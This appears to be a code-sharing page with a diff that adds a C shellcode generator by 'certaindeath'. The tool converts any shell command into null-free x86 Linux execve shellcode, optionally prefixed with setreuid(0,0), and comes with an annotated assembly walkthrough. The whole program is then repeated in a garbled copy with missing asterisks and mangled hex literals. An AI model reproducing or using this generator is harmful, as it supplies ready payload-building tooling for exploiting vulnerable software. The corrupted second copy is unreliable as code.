evi1m0 · April 18, 2017 12:20
diff --git a/generatorshellcode.c b/generatorshellcode.c
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <linux/types.h>
 #define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command

 void print_c(__u8*,int);
 void push_shc(__u8*, char*, int*);
 int main(int argc, char *argv[]){
    char cmd[255], *a;
    FILE *c;
    int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2;
    __u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0};

    if(argc<2){
        printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
               "|      Shellcode Generator      |\n"
               "|        by certaindeath        |\n"
               "|                               |\n"
               "|  Usage: ./generator <cmd>     |\n"
               " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
        _exit(1);
    }
    a=(char *)malloc((9+strlen(argv[1]))*sizeof(char));

    //find the command path
    a[0]=0;
    strcat(a, "whereis ");
    strcat(a, argv[1]);
    c=popen(a, "r");
    while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c)));
    while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c)));
    cmd[--k]=0;
    
    if(k==0){
        printf("No executables found for the command \"%s\".\n", argv[1]);
        _exit(1);
    }

    if(strlen(cmd)>254){
        printf("The lenght of the command path can't be over 254 bye.\n");
        _exit(1);
    }

    for(i=2;i<argc;i++)
        if(strlen(argv[i])>254){
            printf("The lenght of each command argument can't be over 254 byte.\n");
            _exit(1);
        }
    //work out the final shellcode lenght
    b=(k%2);
    b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
    totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
    for(i=2; i<argc;i++){
        k=strlen(argv[i]);
        b=(k%2);
        b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
        totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
    }
    totl+=4*(argc-2);
    printf("Shellcode lenght: %i\n", totl);

    //build the shellcode
    shc=(__u8 *)malloc((totl+1)*sizeof(__u8));
    memcpy(shc, start, 2);
    if(SETRUID){
        memcpy(shc+shp, struid, 10);
        shp+=10;
    }
    if(argc>2)
        push_shc(shc, argv[argc-1], &shp);
    else
        push_shc(shc, cmd, &shp);
    memset(shc+(shp++), 0x89, 1);
    memset(shc+(shp++), 0xe6, 1);
    if(argc>2){
        for(i=argc-2;i>1;i--)
            push_shc(shc, argv[i], &shp);
        push_shc(shc, cmd, &shp);
    }
    memset(shc+(shp++), 0x50, 1);
    memset(shc+(shp++), 0x56, 1);
    if(argc>2){
        for(i=argc-2;i>1;i--){
            memset(shc+(shp++), 0x83, 1);
            memset(shc+(shp++), 0xee, 1);
            memset(shc+(shp++), strlen(argv[i])+1, 1);
            memset(shc+(shp++), 0x56, 1);
        }
        memset(shc+(shp++), 0x83, 1);
        memset(shc+(shp++), 0xee, 1);
        memset(shc+(shp++), strlen(cmd)+1, 1);
        memset(shc+(shp++), 0x56, 1);
    }
    memcpy(shc+shp, end, 16);
    print_c(shc,totl);
    return 0;
 }
 void print_c(__u8 *s,int l){
    int k;
    for(k=0;k<l;k++){
        printf("\\x%.2x", s[k]);
        if(((k+1)%8)==0) printf("\n");
    }
    printf("\n");
 }
 void push_shc(__u8 *out, char *str, int *sp){
    int i=strlen(str), k, b, b1, tmp=i;
    __u8 pushb_0[6]={0x83,0xec,0x01,0x88,0x04,0x24},pushb[6]={0x83,0xec,0x01,0xc6,0x04,0x24};
    memcpy(out+(*sp), pushb_0, 6);
    *sp+=6;
    for(k=0;k<((i-(i%4))/4);k++){
        memset(out+((*sp)++), 0x68, 1);
        tmp-=4;
        memcpy(out+(*sp), str+tmp, 4);
        *sp+=4;
    }
    b=(i%2);
    b1=(b==1) ? (((i-1)/2)%2) : ((i/2)%2);
    if(b1){
        memset(out+((*sp)++), 0x66, 1);
        memset(out+((*sp)++), 0x68, 1);
        tmp-=2;
        memcpy(out+(*sp), str+tmp, 2);
        *sp+=2;
    }
    if(b){
        memcpy(out+(*sp), pushb, 6);
        *sp+=6;
        memcpy(out+((*sp)++), str+(--tmp), 1);
    }
 }
 /*
 Here is the assembly code of a shellcode which executes the command "ls -l /dev".
 This is the method used by the shellcode generator.

    .global _start
 _start:
    xorl %eax, %eax         ;clear eax

    subl $1, %esp           ; "/dev" pushed into the stack with a null byte at the end
    movb %al, (%esp)
    push {1}x7665642f

    movl %esp, %esi         ;esp(address of "/dev") is saved in esi

    subl $1, %esp           ;"-l" pushed into the stack with a null byte at the end
    movb %al, (%esp)
    pushw {1}x6c2d

    subl $1, %esp           ;"/bin/ls" pushed into the stack with a null byte at the end
    movb %al, (%esp)
    push {1}x736c2f6e
    pushw {1}x6962
    subl $1, %esp
    movb {1}x2f, (%esp)

                    ;now the vector {"/bin/ls", "-l", "/dev", NULL} will be created into the stack

    push %eax           ;the NULL pointer pushed into the stack
    push %esi           ;the address of "/dev" pushed into the stack

    subl $3, %esi           ;the lenght of "-l"(with a null byte) is subtracted from the address of "/dev"
    push %esi           ;to find the address of "-l" and then push it into the stack

    subl $8, %esi           ;the same thing is done with the address of "/bin/ls"
    push %esi

    movb $11, %al           ;finally the system call execve("/bin/ls", {"/bin/ls", "-l", "/dev", NULL}, 0)
    movl %esi, %ebx         ;is executed
    movl %esp, %ecx
    xor %edx, %edx
    int {1}x80

    movb $1, %al            ;_exit(0);
    xor %ebx, %ebx
    int {1}x80
 */
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>
	#include <linux/types.h>
	#define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command

	void print_c(__u8*,int);
	void push_shc(__u8, char, int*);
	int main(int argc, char *argv[]){
	char cmd[255], *a;
	FILE *c;
	int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2;
	__u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0};

	if(argc<2){
	printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
	"\| Shellcode Generator \|\n"
	"\| by certaindeath \|\n"
	"\| \|\n"
	"\| Usage: ./generator <cmd> \|\n"
	" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
	_exit(1);
	}
	a=(char )malloc((9+strlen(argv[1]))sizeof(char));

	//find the command path
	a[0]=0;
	strcat(a, "whereis ");
	strcat(a, argv[1]);
	c=popen(a, "r");
	while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c)));
	while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c)));
	cmd[--k]=0;

	if(k==0){
	printf("No executables found for the command \"%s\".\n", argv[1]);
	_exit(1);
	}

	if(strlen(cmd)>254){
	printf("The lenght of the command path can't be over 254 bye.\n");
	_exit(1);
	}

	for(i=2;i<argc;i++)
	if(strlen(argv[i])>254){
	printf("The lenght of each command argument can't be over 254 byte.\n");
	_exit(1);
	}
	//work out the final shellcode lenght
	b=(k%2);
	b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
	totl+=(6+5((k-(k%4))/4)+4b1+7*b);
	for(i=2; i<argc;i++){
	k=strlen(argv[i]);
	b=(k%2);
	b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
	totl+=(6+5((k-(k%4))/4)+4b1+7*b);
	}
	totl+=4*(argc-2);
	printf("Shellcode lenght: %i\n", totl);

	//build the shellcode
	shc=(__u8 )malloc((totl+1)sizeof(__u8));
	memcpy(shc, start, 2);
	if(SETRUID){
	memcpy(shc+shp, struid, 10);
	shp+=10;
	}
	if(argc>2)
	push_shc(shc, argv[argc-1], &shp);
	else
	push_shc(shc, cmd, &shp);
	memset(shc+(shp++), 0x89, 1);
	memset(shc+(shp++), 0xe6, 1);
	if(argc>2){
	for(i=argc-2;i>1;i--)
	push_shc(shc, argv[i], &shp);
	push_shc(shc, cmd, &shp);
	}
	memset(shc+(shp++), 0x50, 1);
	memset(shc+(shp++), 0x56, 1);
	if(argc>2){
	for(i=argc-2;i>1;i--){
	memset(shc+(shp++), 0x83, 1);
	memset(shc+(shp++), 0xee, 1);
	memset(shc+(shp++), strlen(argv[i])+1, 1);
	memset(shc+(shp++), 0x56, 1);
	}
	memset(shc+(shp++), 0x83, 1);
	memset(shc+(shp++), 0xee, 1);
	memset(shc+(shp++), strlen(cmd)+1, 1);
	memset(shc+(shp++), 0x56, 1);
	}
	memcpy(shc+shp, end, 16);
	print_c(shc,totl);
	return 0;
	}
	void print_c(__u8 *s,int l){
	int k;
	for(k=0;k<l;k++){
	printf("\\x%.2x", s[k]);
	if(((k+1)%8)==0) printf("\n");
	}
	printf("\n");
	}
	void push_shc(__u8 out, char str, int *sp){
	int i=strlen(str), k, b, b1, tmp=i;
	__u8 pushb_0[6]={0x83,0xec,0x01,0x88,0x04,0x24},pushb[6]={0x83,0xec,0x01,0xc6,0x04,0x24};
	memcpy(out+(*sp), pushb_0, 6);
	*sp+=6;
	for(k=0;k<((i-(i%4))/4);k++){
	memset(out+((*sp)++), 0x68, 1);
	tmp-=4;
	memcpy(out+(*sp), str+tmp, 4);
	*sp+=4;
	}
	b=(i%2);
	b1=(b==1) ? (((i-1)/2)%2) : ((i/2)%2);
	if(b1){
	memset(out+((*sp)++), 0x66, 1);
	memset(out+((*sp)++), 0x68, 1);
	tmp-=2;
	memcpy(out+(*sp), str+tmp, 2);
	*sp+=2;
	}
	if(b){
	memcpy(out+(*sp), pushb, 6);
	*sp+=6;
	memcpy(out+((*sp)++), str+(--tmp), 1);
	}
	}
	/*
	Here is the assembly code of a shellcode which executes the command "ls -l /dev".
	This is the method used by the shellcode generator.

	.global _start
	_start:
	xorl %eax, %eax ;clear eax

	subl $1, %esp ; "/dev" pushed into the stack with a null byte at the end
	movb %al, (%esp)
	push {1}x7665642f

	movl %esp, %esi ;esp(address of "/dev") is saved in esi

	subl $1, %esp ;"-l" pushed into the stack with a null byte at the end
	movb %al, (%esp)
	pushw {1}x6c2d

	subl $1, %esp ;"/bin/ls" pushed into the stack with a null byte at the end
	movb %al, (%esp)
	push {1}x736c2f6e
	pushw {1}x6962
	subl $1, %esp
	movb {1}x2f, (%esp)

	;now the vector {"/bin/ls", "-l", "/dev", NULL} will be created into the stack

	push %eax ;the NULL pointer pushed into the stack
	push %esi ;the address of "/dev" pushed into the stack

	subl $3, %esi ;the lenght of "-l"(with a null byte) is subtracted from the address of "/dev"
	push %esi ;to find the address of "-l" and then push it into the stack

	subl $8, %esi ;the same thing is done with the address of "/bin/ls"
	push %esi

	movb $11, %al ;finally the system call execve("/bin/ls", {"/bin/ls", "-l", "/dev", NULL}, 0)
	movl %esi, %ebx ;is executed
	movl %esp, %ecx
	xor %edx, %edx
	int {1}x80

	movb $1, %al ;_exit(0);
	xor %ebx, %ebx
	int {1}x80
	*/